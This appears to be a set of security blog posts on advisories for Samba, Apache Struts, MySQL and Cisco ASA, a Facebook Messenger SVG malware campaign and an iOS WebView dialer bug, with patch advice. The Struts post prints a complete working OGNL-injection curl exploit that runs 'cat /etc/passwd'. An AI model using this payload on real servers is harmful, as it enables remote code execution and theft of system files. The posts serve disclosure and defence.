CVE-2017-14746: you need to patch your Samba as soon as possible!

A fresh advisory from SAMBA.org:

All versions of Samba from 4.0.0 onwards are vulnerable to a use after
free vulnerability, where a malicious SMB1 request can be used to
control the contents of heap memory via a deallocated heap pointer. It
is possible this may be used to compromise the SMB server.

The major Linux distributions (Red Hat, Ubuntu, Debian) has already rolled out security patches for this vulnerability, tracked as CVE-2017-14746, that affects all versions of SAMBA since 4.0.

According to the project’s advisory, an unauthenticated attacker could send specially-crafted SMB1 requests to cause the server to crash or execute arbitrary code.

Sysadms should to apply the fixes to their server, otherwise another possibility consists in turning off SAMBA 1:

==========
Workaround
==========

Prevent SMB1 access to the server by setting the parameter:

server min protocol = SMB2

to the [global] section of your smb.conf and restart smbd. This
prevents and SMB1 access to the server. Note this could cause older
clients to be unable to connect to the server.

References

D’oh! Another Apache Struts 2 vulnerability!

Upgrade now, some attacks are already in progress!

Another serious vulnerability was discovered in Apache Struts 2.

Affected versions

Apache Struts 2.3.5–2.3.31
Apache Struts 2.5–2.5.10

The vulnerability

The vulnerability (CVE-2017–5638), firstly reported by the security researcher Nike Zheng, is a remote code execution bug that affects the Jakarta Multipart parser in Apache Struts, as reported in this security advisory:

It is possible to perform a RCE attack with a malicious Content-Type value. If the Content-Type value isn’t valid an exception is thrown which is then used to display an error message to a user.

The researchers have also seen malicious attacks which turn off firewall processes on the target and drop payloads:

“The payloads have varied but include an IRC bouncer, a DoS bot, and a sample related to the bill gates botnet”.

Technical analysis was released by the major security firms:

Cisco’s Talos

Talos has also released some Snort rules that can detect exploitation attemps of the vulnerability(41818, 41819): https://snort.org/advisories/talos-rules-2017-03-07-3-7-2017.

Talos suggest to upgrade ASAP, because the researchers found

“a high number of exploitation events. The majority of the exploitation attempts seem to be leveraging a publicly released proof of concept that is being used to run various commands”.

The proof of concept was released by Qualys.

Qualys

Apache Struts Jakarta Multipart Parser Remote Code Execution Vulnerability

Qualsys releases the proof-of-concept that can check the vulnerability using CURL:

For our analysis, we have used below curl command to replicate the issue:

curl -i -v -s -k -X $'GET' -H $'User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0' -H $'Content-Type:%{(#nike='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@[email protected])).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='cat /etc/passwd').(#iswin=(@[email protected]('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@[email protected]().getOutputStream())).(@[email protected](#process.getInputStream(),#ros)).(#ros.flush())}' $'http://10.10.36.22:8080/struts2-blank/example/HelloWorld.action'

It is important to note that the presence of vulnerable code is enough to exploit the vulnerability. The web application doesn’t necessary need to implement file upload functionality to exploit this vulnerability.

On Rapid7 GitHub repository is also available a python script to check the vulnerability:

https://github.com/rapid7/metasploit-framework/issues/8064

https://gist.github.com/andreafortuna/23792e573fe6f72c843f8f9598db0325

Remediations?

This vulnerability has been fixed Struts 2.3.32 and 2.5.10.1, so…upgrade ASAP!

A new infection vector for ransomware: malicious SVG images via Facebook Messenger

The campaign spreads the Nemucod downloader

If you receive any Facebook Message with an .SVG image file, just avoid clicking it: a malicious campaign is spreading a ransomware downloader (Nemucod) among Facebook users by taking advantage of innocent-looking SVG image file to infect computers.

The campaign was discovered by malware researchers Bart Blazen and Peter Kruse, and seems to be an evolution of the threat notified some months ago by AppRiver.

On his blog, Blazen writes:

Earlier today, a friend of mine notified me of something strange going on with his Facebook account; a message containing only an image (an .svg file in reality) had been sent automatically, effectively bypassing Facebook’s file extension filter

Why SVG file?

Scalable Vector Graphics (SVG) is an XML-based vector image format for two-dimensional graphics with support for interactivity and animation.
This means that this file format has the ability to contain embedded content such as JavaScript, and can be opened in any modern web browser.

In fact, the content of the ‘photo’ (here the analysis of a sample) is the following:

https://gist.github.com/andreafortuna/d318f2aad20bfcf3d86fdd7e9aaa25e5

an obfuscated javascript that starts the download of payload (the Locky ransomware) and opens a fake Youtube site that ask the user to download and install a browser extension required to see the videos:

If the victim installs the Chrome extension, the attack is spread further via Facebook Messenger to all user contacts.


I opened the link and installed the extension, how can I fix it?

from Bart Blazen’s post:

Remove the malicious extension from your browser immediately:

Additionally, run a scan with your antivirus and change your Facebook password afterwards.

Notify your friends you sent a malicious file, or in the other case, let your friend know he/she is infected. If you keep receiving the same message from your friend, you may want to temporarily block their messages.


References

https://bartblaze.blogspot.it/2016/11/nemucod-downloader-spreading-via.html

 

 

A bug in Apple’s WebView allow an attacker to initiate phone calls without user confirm

Twitter and LinkedIn iOS apps are vulnerable!

The security researcher Collin Mulliner has discovered an exploitable vulnerability in Apple’s WebView that could allow phone calls to a number of the attacker’s choosing.

iOS WebViews can be used to automatically call an attacker controlled phone number. The attack can block the phone’s UI for a short amount of time and therefore prevent the victim from canceling the call. The bug is an application bug that likely is due to bad OS/framework defaults. One major issue with this vulnerability is that it is really easy to exploit. App developers have to fix their code as soon as possible.

Mulliner said the vulnerability is trivial to exploit, requiring at a minimum one line of HTML code and iOS developers who have embedded Apple’s WebView into mobile apps need to be aware.

https://gist.github.com/andreafortuna/50d68e9d109c25bc2cb84abee42463fa

The risks to the user include calls to to premium numbers or denial-of-service against telephone numbers of public services:

About a week agoI read an news post about a guy who got arrested for accidentally DoSing 911 by creating a web page that automatically dialed 911 when visited it from an iPhone. This was most likely due to a bug with the handling of TEL URI. I immediately thought about a bug I reported to Apple in late October 2008 . I couldn’t believe this bug has resurfaced so I investigated. The article said something about posting links on Twitter.

The researcher has also published two video demonstration of the exploit:

 


References

https://www.mulliner.org/blog/blosxom.cgi/security/ios_webview_auto_dialer.html

 

Exploits released for two critical 0Day vulnerabilities on MySQL

These vulnerabilities could be exploited in shared hosting environments to gain access to all databases

Some weeks ago i have reported about 2 critical 0Day vulnerabilities of MySQL (and his forks MariaDB e PerconaDB).

At that time, the security researcher Dawid Golunski published only technical details and proof-of-concept exploit code for the first bug.
Now Golunski has released a POC exploits for all two vulnerabilities:

https://legalhackers.com/advisories/MySQL-Maria-Percona-PrivEscRace-CVE-2016-6663-5616-Exploit.html

 

https://gist.github.com/andreafortuna/1bdc25021089be5344047b7ded433fc8

One is the previously promised critical privilege escalation vulnerability (CVE-2016–6663) that can allow a low-privileged account (with CREATE/INSERT/SELECT grants) with access to the affected database to escalate their privileges and execute arbitrary code as the database system user.

The other is a new root privilege escalation bug (CVE-2016–6664) that could allow attackers with ‘MySQL system user’ privilege to further escalate their privileges to root user, allowing them to fully compromise the system.

Both the vulnerabilities affect MySQL version 5.5.51 and earlier, MySQL version 5.6.32 and earlier, and MySQL version 5.7.14 and earlier.


Patchs and Mitigations

MySQL has already fixed the vulnerabilities and you are strongly advised to apply patches as soon as possible.

If you are unable to immediately apply patches, you can apply a temporary mitigation disabling symbolic link support within your database server configuration to this setting in my.cnf:

symbolic-links = 0

CVE-2016-6662: a critical MySQL Zero-Day

Oracle, are you there? We need you!

Dawid Golunski, a Polish security researcher discovered several security issues in the MySQL DBMS, including a vulnerability flaw (CVE-2016–6662) that can be exploited by a remote attacker to inject malicious settings into my.cnf configuration files.

The vulnerability that affect all currently supported MySQL versions as well as MariaDB and PerconaDB.

The vulnerability can be exploited via SQL injection attack, or by an attacker with valid credentials either locally or over the Web via phpMyAdmin:

“A successful exploitation could allow attackers to execute arbitrary code with root privileges which would then allow them to fully compromise the server on which an affected version of MySQL is running”

Golunski has also published a proof-of-concept exploit code:

https://gist.github.com/andreafortuna/7c6e6d8aa936ef459fdbd9298b77452e

More technical information on official advisory.

Patching?

From Golunski’s advisory:

The vulnerability was reported to Oracle on 29th of July 2016 and triaged
by the security team.
It was also reported to the other affected vendors including PerconaDB and MariaDB.

The vulnerabilities were patched by PerconaDB and MariaDB vendors by the end of
30th of August.
During the course of the patching by these vendors the patches went into
public repositories and the fixed security issues were also mentioned in the
new releases which could be noticed by malicious attackers.

As over 40 days have passed since reporting the issues and patches were already
mentioned publicly, a decision was made to start disclosing vulnerabilities
(with limited PoC) to inform users about the risks before the vendor's next 
CPU update that only happens at the end of October.

No official patches or mitigations are available at this time from the vendor. 
As temporary mitigations, users should ensure that no mysql config files are
owned by mysql user, and create root-owned dummy my.cnf files that are not in 
use.
These are by no means a complete solution and users should apply official vendor
patches as soon as they become available.

References

http://legalhackers.com/advisories/MySQL-Exploit-Remote-Root-Code-Execution-Privesc-CVE-2016-6662.html

CVE-2016–1287: Cisco ASA Software IKEv1 / IKEv2 Buffer Overflow, proof of concept released

Exodus Intelligence have released the proof of concept code on their GitHub page

On February, 10 2016 a vulnerability related to the Internet Key Exchange (IKE) protocol implementation of Cisco devices (CVE-2016–1287) was ufficially released.

Yesterday, the researchers who found this bug, Exodus Intel, have released the proof of concept code on their GitHub page.


Affected Products

  • Cisco ASA 5500 Series Adaptive Security Appliances
  • Cisco ASA 5500-X Series Next-Generation Firewalls
  • Cisco ASA Services Module for Cisco Catalyst 6500 Series Switches and Cisco 7600 Series Routers
  • Cisco ASA 1000V Cloud Firewall
  • Cisco Adaptive Security Virtual Appliance (ASAv)
  • Cisco Firepower 9300 ASA Security Module
  • Cisco ISA 3000 Industrial Security Appliance

Cisco has already released a software updates that address the vulnerability.


The POC

https://gist.github.com/andreafortuna/657ed351b1231bfa43ffe8a603c3fb95


Links and resources